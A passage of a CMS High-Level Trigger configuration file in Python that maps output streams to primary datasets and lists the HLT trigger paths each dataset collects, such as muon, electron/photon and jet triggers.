inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
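# Output stream definition: each entry maps an online stream name to the list of
# primary datasets written into that stream.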
streams = cms.PSet(
ALCALumiPixelCountsExpress = cms.vstring( 'AlCaLumiPixelCountsExpress' ),
ALCALumiPixelCountsPrompt = cms.vstring( 'AlCaLumiPixelCountsPrompt' ),
ALCAP0 = cms.vstring( 'AlCaP0' ),
ALCAPHISYM = cms.vstring( 'AlCaPhiSym' ),
Calibration = cms.vstring( 'TestEnablesEcalHcal' ),
DQM = cms.vstring( 'OnlineMonitor' ),
DQMCalibration = cms.vstring( 'TestEnablesEcalHcalDQM' ),
DQMEventDisplay = cms.vstring( 'EventDisplay' ),
DQMOnlineBeamspot = cms.vstring( 'DQMOnlineBeamspot' ),
EcalCalibration = cms.vstring( 'EcalLaser' ),
Express = cms.vstring( 'ExpressPhysics' ),
ExpressAlignment = cms.vstring( 'ExpressAlignment' ),
HLTMonitor = cms.vstring( 'HLTMonitor' ),
NanoDST = cms.vstring( 'L1Accept' ),
ParkingBPH1 = cms.vstring( 'ParkingBPH1',
'ParkingBPHPromptCSCS' ),
ParkingBPH2 = cms.vstring( 'ParkingBPH2' ),
ParkingBPH3 = cms.vstring( 'ParkingBPH3' ),
ParkingBPH4 = cms.vstring( 'ParkingBPH4' ),
ParkingBPH5 = cms.vstring( 'ParkingBPH5' ),
PhysicsCommissioning = cms.vstring( 'Commissioning',
'Cosmics',
'HLTPhysics',
'HcalNZS',
'HighPtLowerPhotons',
'HighPtPhoton30AndZ',
'IsolatedBunch',
'MonteCarlo',
'NoBPTX',
'ZeroBias' ),
PhysicsEGamma = cms.vstring( 'EGamma' ),
PhysicsEndOfFill = cms.vstring( 'EmptyBX',
'FSQJet1',
'FSQJet2',
'HINCaloJets',
'HINPFJets' ),
PhysicsHLTPhysics1 = cms.vstring( 'EphemeralHLTPhysics1',
'EphemeralHLTPhysics2' ),
PhysicsHLTPhysics2 = cms.vstring( 'EphemeralHLTPhysics3',
'EphemeralHLTPhysics4' ),
PhysicsHLTPhysics3 = cms.vstring( 'EphemeralHLTPhysics5',
'EphemeralHLTPhysics6' ),
PhysicsHLTPhysics4 = cms.vstring( 'EphemeralHLTPhysics7',
'EphemeralHLTPhysics8' ),
PhysicsHadronsTaus = cms.vstring( 'BTagMu',
'DisplacedJet',
'JetHT',
'MET',
'Tau' ),
PhysicsMuons = cms.vstring( 'Charmonium',
'DoubleMuon',
'DoubleMuonLowMass',
'MuOnia',
'MuonEG',
'SingleMuon' ),
PhysicsScoutingMonitor = cms.vstring( 'ScoutingMonitor' ),
PhysicsZeroBias1 = cms.vstring( 'EphemeralZeroBias1',
'EphemeralZeroBias2' ),
PhysicsZeroBias2 = cms.vstring( 'EphemeralZeroBias3',
'EphemeralZeroBias4' ),
PhysicsZeroBias3 = cms.vstring( 'EphemeralZeroBias5',
'EphemeralZeroBias6' ),
PhysicsZeroBias4 = cms.vstring( 'EphemeralZeroBias7',
'EphemeralZeroBias8' ),
RPCMON = cms.vstring( 'RPCMonitor' ),
ScoutingPF = cms.vstring( 'ScoutingPFRun3' )
)
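# Primary dataset definition: each entry maps a primary dataset name to the list of
# HLT paths whose accepted events it collects.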
datasets = cms.PSet(
AlCaLumiPixelCountsExpress = cms.vstring( 'AlCa_LumiPixelsCounts_Random_v1' ),
AlCaLumiPixelCountsPrompt = cms.vstring( 'AlCa_LumiPixelsCounts_ZeroBias_v1' ),
AlCaP0 = cms.vstring( 'AlCa_EcalEtaEBonly_v13',
'AlCa_EcalEtaEEonly_v13',
'AlCa_EcalPi0EBonly_v13',
'AlCa_EcalPi0EEonly_v13' ),
AlCaPhiSym = cms.vstring( 'AlCa_EcalPhiSym_v9' ),
BTagMu = cms.vstring( 'HLT_BTagMu_AK4DiJet110_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet110_Mu5_v13',
'HLT_BTagMu_AK4DiJet170_Mu5_noalgo_v12',
'HLT_BTagMu_AK4DiJet170_Mu5_v12',
'HLT_BTagMu_AK4DiJet20_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet20_Mu5_v13',
'HLT_BTagMu_AK4DiJet40_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet40_Mu5_v13',
'HLT_BTagMu_AK4DiJet70_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet70_Mu5_v13',
'HLT_BTagMu_AK4Jet300_Mu5_noalgo_v12',
'HLT_BTagMu_AK4Jet300_Mu5_v12',
'HLT_BTagMu_AK8DiJet170_Mu5_noalgo_v9',
'HLT_BTagMu_AK8DiJet170_Mu5_v9',
'HLT_BTagMu_AK8Jet170_DoubleMu5_noalgo_v2',
'HLT_BTagMu_AK8Jet170_DoubleMu5_v2',
'HLT_BTagMu_AK8Jet300_Mu5_noalgo_v12',
'HLT_BTagMu_AK8Jet300_Mu5_v12' ),
Charmonium = cms.vstring( 'HLT_Dimuon0_Jpsi3p5_Muon2_v5',
'HLT_Dimuon0_Jpsi_L1_4R_0er1p5R_v7',
'HLT_Dimuon0_Jpsi_L1_NoOS_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_L1_4R_0er1p5R_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_NoOS_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_v8',
'HLT_Dimuon0_Jpsi_v8',
'HLT_Dimuon0_LowMass_L1_0er1p5R_v7',
'HLT_Dimuon0_LowMass_L1_0er1p5_v8',
'HLT_Dimuon0_LowMass_L1_4R_v7',
'HLT_Dimuon0_LowMass_L1_4_v8',
'HLT_Dimuon0_LowMass_v8',
'HLT_Dimuon10_PsiPrime_Barrel_Seagulls_v7',
'HLT_Dimuon18_PsiPrime_noCorrL1_v6',
'HLT_Dimuon18_PsiPrime_v14',
'HLT_Dimuon20_Jpsi_Barrel_Seagulls_v7',
'HLT_Dimuon25_Jpsi_noCorrL1_v6',
'HLT_Dimuon25_Jpsi_v14',
'HLT_DoubleMu2_Jpsi_DoubleTkMu0_Phi_v5',
'HLT_DoubleMu2_Jpsi_DoubleTrk1_Phi1p05_v6',
'HLT_DoubleMu4_3_Bs_v14',
'HLT_DoubleMu4_3_Jpsi_v2',
'HLT_DoubleMu4_JpsiTrkTrk_Displaced_v7',
'HLT_DoubleMu4_JpsiTrk_Displaced_v15',
'HLT_DoubleMu4_Jpsi_Displaced_v7',
'HLT_DoubleMu4_Jpsi_NoVertexing_v7',
'HLT_DoubleMu4_PsiPrimeTrk_Displaced_v15',
'HLT_Mu30_TkMu0_Psi_v1',
'HLT_Mu7p5_L2Mu2_Jpsi_v10',
'HLT_Mu7p5_Track2_Jpsi_v11',
'HLT_Mu7p5_Track3p5_Jpsi_v11',
'HLT_Mu7p5_Track7_Jpsi_v11' ),
Commissioning = cms.vstring( 'HLT_IsoTrackHB_v4',
'HLT_IsoTrackHE_v4',
'HLT_L1_CDC_SingleMu_3_er1p2_TOP120_DPHI2p618_3p142_v2' ),
Cosmics = cms.vstring( 'HLT_L1SingleMuCosmics_v1' ),
DQMOnlineBeamspot = cms.vstring( 'HLT_HT300_Beamspot_v11',
'HLT_HT450_Beamspot_v11',
'HLT_ZeroBias_Beamspot_v4' ),
DisplacedJet = cms.vstring( 'HLT_HT400_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT425_v9',
'HLT_HT430_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT430_DisplacedDijet60_DisplacedTrack_v13',
'HLT_HT500_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT550_DisplacedDijet60_Inclusive_v13',
'HLT_HT650_DisplacedDijet60_Inclusive_v13' ),
DoubleMuon = cms.vstring( 'HLT_DoubleL2Mu23NoVtx_2Cha_CosmicSeed_NoL2Matched_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_CosmicSeed_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_NoL2Matched_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_Eta2p4_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_NoL2Matched_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_Eta2p4_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_NoL2Matched_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_v2',
'HLT_DoubleL2Mu30NoVtx_2Cha_CosmicSeed_Eta2p4_v2',
'HLT_DoubleL2Mu30NoVtx_2Cha_Eta2p4_v2',
'HLT_DoubleL2Mu50_v2',
'HLT_DoubleMu33NoFiltersNoVtxDisplaced_v1',
'HLT_DoubleMu3_DCA_PFMET50_PFMHT60_v10',
'HLT_DoubleMu3_DZ_PFMET50_PFMHT60_v10',
'HLT_DoubleMu3_DZ_PFMET70_PFMHT70_v10',
'HLT_DoubleMu3_DZ_PFMET90_PFMHT90_v10',
'HLT_DoubleMu40NoFiltersNoVtxDisplaced_v1',
'HLT_DoubleMu43NoFiltersNoVtx_v4',
'HLT_DoubleMu48NoFiltersNoVtx_v4',
'HLT_DoubleMu4_Mass3p8_DZ_PFHT350_v8',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass3p8_v5',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass8_v5',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_v15',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_v14',
'HLT_Mu17_TrkIsoVVL_v13',
'HLT_Mu17_v13',
'HLT_Mu18_Mu9_DZ_v4',
'HLT_Mu18_Mu9_SameSign_DZ_v4',
'HLT_Mu18_Mu9_SameSign_v4',
'HLT_Mu18_Mu9_v4',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_Mass3p8_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_Mass8_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_v3',
'HLT_Mu19_TrkIsoVVL_v4',
'HLT_Mu19_v4',
'HLT_Mu20_Mu10_DZ_v4',
'HLT_Mu20_Mu10_SameSign_DZ_v4',
'HLT_Mu20_Mu10_SameSign_v4',
'HLT_Mu20_Mu10_v4',
'HLT_Mu23_Mu12_DZ_v4',
'HLT_Mu23_Mu12_SameSign_DZ_v4',
'HLT_Mu23_Mu12_SameSign_v4',
'HLT_Mu23_Mu12_v4',
'HLT_Mu37_TkMu27_v5',
'HLT_Mu8_TrkIsoVVL_v12',
'HLT_Mu8_v12',
'HLT_TripleMu_10_5_5_DZ_v10',
'HLT_TripleMu_12_10_5_v10',
'HLT_TripleMu_5_3_3_Mass3p8_DCA_v3',
'HLT_TripleMu_5_3_3_Mass3p8_DZ_v8',
'HLT_TrkMu12_DoubleTrkMu5NoFiltersNoVtx_v6',
'HLT_TrkMu16_DoubleTrkMu6NoFiltersNoVtx_v12',
'HLT_TrkMu17_DoubleTrkMu8NoFiltersNoVtx_v13' ),
DoubleMuonLowMass = cms.vstring( 'HLT_Dimuon0_LowMass_L1_TM530_v6',
'HLT_DoubleMu3_TkMu_DsTau3Mu_v4',
'HLT_DoubleMu3_Trk_Tau3mu_NoL1Mass_v6',
'HLT_DoubleMu3_Trk_Tau3mu_v12',
'HLT_DoubleMu4_LowMassNonResonantTrk_Displaced_v15',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_IsoTau15_Charge1_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_IsoTau15_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_Tau15_Charge1_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_Tau15_v4' ),
EGamma = cms.vstring( 'HLT_DiEle27_WPTightCaloOnly_L1DoubleEG_v4',
'HLT_DiSC30_18_EIso_AND_HE_Mass70_v13',
'HLT_Diphoton30PV_18PV_R9Id_AND_IsoCaloId_AND_HE_R9Id_NoPixelVeto_Mass55_v13',
'HLT_Diphoton30PV_18PV_R9Id_AND_IsoCaloId_AND_HE_R9Id_PixelVeto_Mass55_v15',
'HLT_Diphoton30_18_R9IdL_AND_HE_AND_IsoCaloId_NoPixelVeto_Mass55_v2',
'HLT_Diphoton30_18_R9IdL_AND_HE_AND_IsoCaloId_NoPixelVeto_v2',
'HLT_Diphoton30_22_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass90_v13',
'HLT_Diphoton30_22_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass95_v13',
'HLT_DoubleEle25_CaloIdL_MW_v4',
'HLT_DoubleEle27_CaloIdL_MW_v4',
'HLT_DoubleEle33_CaloIdL_MW_v17',
'HLT_DoubleEle8_CaloIdM_TrackIdM_Mass8_DZ_PFHT350_v20',
'HLT_DoubleEle8_CaloIdM_TrackIdM_Mass8_PFHT350_v20',
'HLT_DoublePhoton33_CaloIdL_v6',
'HLT_DoublePhoton70_v6',
'HLT_DoublePhoton85_v14',
'HLT_ECALHT800_v10',
'HLT_Ele115_CaloIdVT_GsfTrkIdT_v14',
'HLT_Ele12_CaloIdL_TrackIdL_IsoVL_PFJet30_v18',
'HLT_Ele135_CaloIdVT_GsfTrkIdT_v7',
'HLT_Ele145_CaloIdVT_GsfTrkIdT_v8',
'HLT_Ele15_CaloIdL_TrackIdL_IsoVL_PFJet30_v3',
'HLT_Ele15_Ele8_CaloIdL_TrackIdL_IsoVL_v3',
'HLT_Ele15_IsoVVVL_PFHT450_CaloBTagDeepCSV_4p5_v8',
'HLT_Ele15_IsoVVVL_PFHT450_PFMET50_v16',
'HLT_Ele15_IsoVVVL_PFHT450_v16',
'HLT_Ele15_IsoVVVL_PFHT600_v20',
'HLT_Ele15_WPLoose_Gsf_v3',
'HLT_Ele16_Ele12_Ele8_CaloIdL_TrackIdL_v9',
'HLT_Ele17_CaloIdM_TrackIdM_PFJet30_v16',
'HLT_Ele17_WPLoose_Gsf_v3',
'HLT_Ele200_CaloIdVT_GsfTrkIdT_v8',
'HLT_Ele20_WPLoose_Gsf_v6',
'HLT_Ele20_WPTight_Gsf_v6',
'HLT_Ele20_eta2p1_WPLoose_Gsf_v6',
'HLT_Ele23_CaloIdL_TrackIdL_IsoVL_PFJet30_v18',
'HLT_Ele23_CaloIdM_TrackIdM_PFJet30_v18',
'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v19',
'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_v19',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTau30_eta2p1_CrossL1_v13',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_MediumChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_MediumChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_TightChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_TightChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele250_CaloIdVT_GsfTrkIdT_v13',
'HLT_Ele27_Ele37_CaloIdL_MW_v4',
'HLT_Ele27_WPTight_Gsf_v16',
'HLT_Ele28_HighEta_SC20_Mass55_v13',
'HLT_Ele28_WPTight_Gsf_v1',
'HLT_Ele28_eta2p1_WPTight_Gsf_HT150_v13',
'HLT_Ele300_CaloIdVT_GsfTrkIdT_v13',
'HLT_Ele30_WPTight_Gsf_v1',
'HLT_Ele30_eta2p1_WPTight_Gsf_CentralPFJet35_EleCleaned_v13',
'HLT_Ele32_WPTight_Gsf_L1DoubleEG_v9',
'HLT_Ele32_WPTight_Gsf_v15',
'HLT_Ele35_WPTight_Gsf_L1EGMT_v5',
'HLT_Ele35_WPTight_Gsf_v9',
'HLT_Ele38_WPTight_Gsf_v9',
'HLT_Ele40_WPTight_Gsf_v9',
'HLT_Ele50_CaloIdVT_GsfTrkIdT_PFJet165_v18',
'HLT_Ele50_IsoVVVL_PFHT450_v16',
'HLT_Ele8_CaloIdL_TrackIdL_IsoVL_PFJet30_v16',
'HLT_Ele8_CaloIdM_TrackIdM_PFJet30_v18',
'HLT_Photon100EBHE10_v2',
'HLT_Photon100EB_TightID_TightIso_v2',
'HLT_Photon100EEHE10_v2',
'HLT_Photon100EE_TightID_TightIso_v2',
'HLT_Photon110EB_TightID_TightIso_v2',
'HLT_Photon120EB_TightID_TightIso_v2',
'HLT_Photon120_R9Id90_HE10_IsoM_v14',
'HLT_Photon120_v13',
'HLT_Photon150_v6',
'HLT_Photon165_R9Id90_HE10_IsoM_v15',
'HLT_Photon175_v14',
'HLT_Photon200_v13',
'HLT_Photon20_HoverELoose_v10',
'HLT_Photon20_v2',
'HLT_Photon300_NoHE_v12',
'HLT_Photon30_HoverELoose_v10',
'HLT_Photon33_v5',
'HLT_Photon50_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ300DEta3_PFMET50_v5',
'HLT_Photon50_R9Id90_HE10_IsoM_v14',
'HLT_Photon50_v13',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_DisplacedIdL_PFHT350MinPFJet15_v11',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_DisplacedIdL_v5',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_CaloMJJ300_PFJetsMJJ400DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_CaloMJJ400_PFJetsMJJ600DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ300DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ600DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_v14',
'HLT_Photon75_v13',
'HLT_Photon90_CaloIdL_PFHT700_v16',
'HLT_Photon90_R9Id90_HE10_IsoM_v14',
'HLT_Photon90_v13',
'HLT_TriplePhoton_20_20_20_CaloIdLV2_R9IdVL_v3',
'HLT_TriplePhoton_20_20_20_CaloIdLV2_v3',
'HLT_TriplePhoton_30_30_10_CaloIdLV2_R9IdVL_v4',
'HLT_TriplePhoton_30_30_10_CaloIdLV2_v4',
'HLT_TriplePhoton_35_35_5_CaloIdLV2_R9IdVL_v4' ),
EcalLaser = cms.vstring( 'HLT_EcalCalibration_v4' ),
EmptyBX = cms.vstring( 'HLT_L1NotBptxOR_v3',
'HLT_L1UnpairedBunchBptxMinus_v2',
'HLT_L1UnpairedBunchBptxPlus_v2' ),
EphemeralHLTPhysics1 = cms.vstring( 'HLT_Physics_part0_v7' ),
EphemeralHLTPhysics2 = cms.vstring( 'HLT_Physics_part1_v7' ),
EphemeralHLTPhysics3 = cms.vstring( 'HLT_Physics_part2_v7' ),
EphemeralHLTPhysics4 = cms.vstring( 'HLT_Physics_part3_v7' ),
EphemeralHLTPhysics5 = cms.vstring( 'HLT_Physics_part4_v7' ),
EphemeralHLTPhysics6 = cms.vstring( 'HLT_Physics_part5_v7' ),
EphemeralHLTPhysics7 = cms.vstring( 'HLT_Physics_part6_v7' ),
EphemeralHLTPhysics8 = cms.vstring( 'HLT_Physics_part7_v7' ),
EphemeralZeroBias1 = cms.vstring( 'HLT_ZeroBias_part0_v6' ),
EphemeralZeroBias2 = cms.vstring( 'HLT_ZeroBias_part1_v6' ),
EphemeralZeroBias3 = cms.vstring( 'HLT_ZeroBias_part2_v6' ),
EphemeralZeroBias4 = cms.vstring( 'HLT_ZeroBias_part3_v6' ),
EphemeralZeroBias5 = cms.vstring( 'HLT_ZeroBias_part4_v6' ),
EphemeralZeroBias6 = cms.vstring( 'HLT_ZeroBias_part5_v6' ),
EphemeralZeroBias7 = cms.vstring( 'HLT_ZeroBias_part6_v6' ),
EphemeralZeroBias8 = cms.vstring( 'HLT_ZeroBias_part7_v6' ),
EventDisplay = cms.vstring( 'HLT_AK4PFJet100_v19',
'HLT_DoublePhoton85_v14',
'HLT_PFJet500_v21' ),
ExpressAlignment = cms.vstring( 'HLT_HT300_Beamspot_v11',
'HLT_HT450_Beamspot_v11',
'HLT_ZeroBias_Beamspot_v4' ),
ExpressPhysics = cms.vstring( 'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v19',
'HLT_IsoMu20_v15',
'HLT_IsoMu24_v13',
'HLT_IsoMu27_v16',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_v15',
'HLT_Physics_v7',
'HLT_Random_v3',
'HLT_ZeroBias_Alignment_v1',
'HLT_ZeroBias_FirstCollisionAfterAbortGap_v5',
'HLT_ZeroBias_IsolatedBunches_v5',
'HLT_ZeroBias_v6' ),
FSQJet1 = cms.vstring( 'HLT_DiPFJet15_NoCaloMatched_v16',
'HLT_DiPFJet25_NoCaloMatched_v16' ),
FSQJet2 = cms.vstring( 'HLT_DiPFJet15_FBEta3_NoCaloMatched_v17',
'HLT_DiPFJet25_FBEta3_NoCaloMatched_v17',
'HLT_DiPFJetAve15_HFJEC_v17',
'HLT_DiPFJetAve25_HFJEC_v17',
'HLT_DiPFJetAve35_HFJEC_v17' ),
HINCaloJets = cms.vstring( 'HLT_AK4CaloJet100_v10',
'HLT_AK4CaloJet120_v9',
'HLT_AK4CaloJet30_v11',
'HLT_AK4CaloJet40_v10',
'HLT_AK4CaloJet50_v10',
'HLT_AK4CaloJet80_v10' ),
HINPFJets = cms.vstring( 'HLT_AK4PFJet100_v19',
'HLT_AK4PFJet120_v18',
'HLT_AK4PFJet30_v19',
'HLT_AK4PFJet50_v19',
'HLT_AK4PFJet80_v19' ),
HLTMonitor = cms.vstring( 'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v19',
'HLT_Ele32_WPTight_Gsf_v15',
'HLT_HT400_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT550_DisplacedDijet60_Inclusive_v13',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_CaloBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_PFBtagDeepCSV_1p5_v1',
'HLT_PFHT400_SixPFJet32_DoublePFBTagDeepCSV_2p94_v8',
'HLT_PFHT510_v17',
'HLT_PFJet260_v20',
'HLT_PFJet320_v20',
'HLT_PFMET130_PFMHT130_IDTight_v20',
'HLT_PFMET140_PFMHT140_IDTight_v20' ),
HLTPhysics = cms.vstring( 'HLT_Physics_v7' ),
HcalNZS = cms.vstring( 'HLT_HcalNZS_v13',
'HLT_HcalPhiSym_v15' ),
HighPtLowerPhotons = cms.vstring( 'HLT_SinglePhoton10_Eta3p1ForPPRef_v8',
'HLT_SinglePhoton20_Eta3p1ForPPRef_v9' ),
HighPtPhoton30AndZ = cms.vstring( 'HLT_SinglePhoton30_Eta3p1ForPPRef_v9' ),
IsolatedBunch = cms.vstring( 'HLT_HcalIsolatedbunch_v5' ),
JetHT = cms.vstring( 'HLT_AK8PFHT750_TrimMass50_v12',
'HLT_AK8PFHT800_TrimMass50_v12',
'HLT_AK8PFHT850_TrimMass50_v11',
'HLT_AK8PFHT900_TrimMass50_v11',
'HLT_AK8PFJet140_v15',
'HLT_AK8PFJet15_v3',
'HLT_AK8PFJet200_v15',
'HLT_AK8PFJet25_v3',
'HLT_AK8PFJet260_v16',
'HLT_AK8PFJet320_v16',
'HLT_AK8PFJet330_TrimMass30_PFAK8BTagDeepCSV_p17_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BTagDeepCSV_p1_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_np2_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_np4_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_p02_v3',
'HLT_AK8PFJet360_TrimMass30_v18',
'HLT_AK8PFJet380_TrimMass30_v11',
'HLT_AK8PFJet400_TrimMass30_v12',
'HLT_AK8PFJet400_v16',
'HLT_AK8PFJet40_v16',
'HLT_AK8PFJet420_TrimMass30_v11',
'HLT_AK8PFJet450_v16',
'HLT_AK8PFJet500_v16',
'HLT_AK8PFJet550_v11',
'HLT_AK8PFJet60_v15',
'HLT_AK8PFJet80_v15',
'HLT_AK8PFJetFwd140_v14',
'HLT_AK8PFJetFwd15_v3',
'HLT_AK8PFJetFwd200_v14',
'HLT_AK8PFJetFwd25_v3',
'HLT_AK8PFJetFwd260_v15',
'HLT_AK8PFJetFwd320_v15',
'HLT_AK8PFJetFwd400_v15',
'HLT_AK8PFJetFwd40_v15',
'HLT_AK8PFJetFwd450_v15',
'HLT_AK8PFJetFwd500_v15',
'HLT_AK8PFJetFwd60_v14',
'HLT_AK8PFJetFwd80_v14',
'HLT_CaloJet500_NoJetID_v12',
'HLT_CaloJet550_NoJetID_v7',
'HLT_DiPFJetAve100_HFJEC_v16',
'HLT_DiPFJetAve140_v13',
'HLT_DiPFJetAve160_HFJEC_v16',
'HLT_DiPFJetAve200_v13',
'HLT_DiPFJetAve220_HFJEC_v16',
'HLT_DiPFJetAve260_v14',
'HLT_DiPFJetAve300_HFJEC_v16',
'HLT_DiPFJetAve320_v14',
'HLT_DiPFJetAve400_v14',
'HLT_DiPFJetAve40_v14',
'HLT_DiPFJetAve500_v14',
'HLT_DiPFJetAve60_HFJEC_v15',
'HLT_DiPFJetAve60_v14',
'HLT_DiPFJetAve80_HFJEC_v16',
'HLT_DiPFJetAve80_v13',
'HLT_DoublePFJets100_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets116MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets128MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets200_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets350_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets40_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets100_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets200_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets350_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets40MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets40_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets54MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets62MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_PFHT1050_v18',
'HLT_PFHT180_v17',
'HLT_PFHT250_v17',
'HLT_PFHT330PT30_QuadPFJet_75_60_45_40_TriplePFBTagDeepCSV_4p5_v3',
'HLT_PFHT330PT30_QuadPFJet_75_60_45_40_v9',
'HLT_PFHT350MinPFJet15_v9',
'HLT_PFHT350_v19',
'HLT_PFHT370_v17',
'HLT_PFHT400_FivePFJet_100_100_60_30_30_DoublePFBTagDeepCSV_4p5_v8',
'HLT_PFHT400_FivePFJet_100_100_60_30_30_v8',
'HLT_PFHT400_FivePFJet_120_120_60_30_30_DoublePFBTagDeepCSV_4p5_v8',
'HLT_PFHT400_SixPFJet32_DoublePFBTagDeepCSV_2p94_v8',
'HLT_PFHT400_SixPFJet32_v8',
'HLT_PFHT430_v17',
'HLT_PFHT450_SixPFJet36_PFBTagDeepCSV_1p59_v7',
'HLT_PFHT450_SixPFJet36_v7',
'HLT_PFHT500_PFMET100_PFMHT100_IDTight_v12',
'HLT_PFHT500_PFMET110_PFMHT110_IDTight_v12',
'HLT_PFHT510_v17',
'HLT_PFHT590_v17',
'HLT_PFHT680_v17',
'HLT_PFHT700_PFMET85_PFMHT85_IDTight_v12',
'HLT_PFHT700_PFMET95_PFMHT95_IDTight_v12',
'HLT_PFHT780_v17',
'HLT_PFHT800_PFMET75_PFMHT75_IDTight_v12',
'HLT_PFHT800_PFMET85_PFMHT85_IDTight_v12',
'HLT_PFHT890_v17',
'HLT_PFJet140_v19',
'HLT_PFJet15_v3',
'HLT_PFJet200_v19',
'HLT_PFJet25_v3',
'HLT_PFJet260_v20',
'HLT_PFJet320_v20',
'HLT_PFJet400_v20',
'HLT_PFJet40_v21',
'HLT_PFJet450_v21',
'HLT_PFJet500_v21',
'HLT_PFJet550_v11',
'HLT_PFJet60_v21',
'HLT_PFJet80_v20',
'HLT_PFJetFwd140_v18',
'HLT_PFJetFwd15_v3',
'HLT_PFJetFwd200_v18',
'HLT_PFJetFwd25_v3',
'HLT_PFJetFwd260_v19',
'HLT_PFJetFwd320_v19',
'HLT_PFJetFwd400_v19',
'HLT_PFJetFwd40_v19',
'HLT_PFJetFwd450_v19',
'HLT_PFJetFwd500_v19',
'HLT_PFJetFwd60_v19',
'HLT_PFJetFwd80_v18',
